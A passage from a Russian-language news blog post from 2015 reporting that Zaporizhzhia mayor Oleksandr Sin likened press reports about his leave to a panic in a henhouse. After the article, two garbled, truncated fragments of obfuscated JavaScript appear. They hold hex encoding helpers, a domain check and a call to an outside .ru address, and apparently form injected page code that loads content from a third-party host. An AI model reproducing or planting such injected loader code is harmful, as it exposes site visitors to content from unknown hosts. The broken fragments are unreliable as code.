ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Син назвал журналистов петухами, СМИ – курятником, а себя больным

Posted by operkor на Ноябрь 23, 2015

3=Пока еще городской голова Запорожья Александр Син назвал информацию в СМИ о своем уходе в отпуск переполохом в курятнике. Об этом он написал на своей странице в Фейсбуке:

«Так рождаются дешевые сенсации. Сначала один сайт пишет, что я ухожу в отпуск с 20 ноября. Потом — другой пишет, что я еду в Польшу. Потом — третий начинает рассуждать, что когда выйду из отпуска неизвестно, а обещал город готовить к зиме. Мне эта перекличка в СМИ напоминает переполох в курятнике: один петух, не подумав, начинает кукарекать и все дружно подхватывают», — возмутился мэр на своей странице в Facebook.

«На самом деле в отпуск я иду с 23 ноября. Никуда из Запорожья не уезжаю, и буду заниматься своим здоровьем. Город к зиме готов», — подчеркнул Александр Син.

Карикатура: Суббота плюс

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: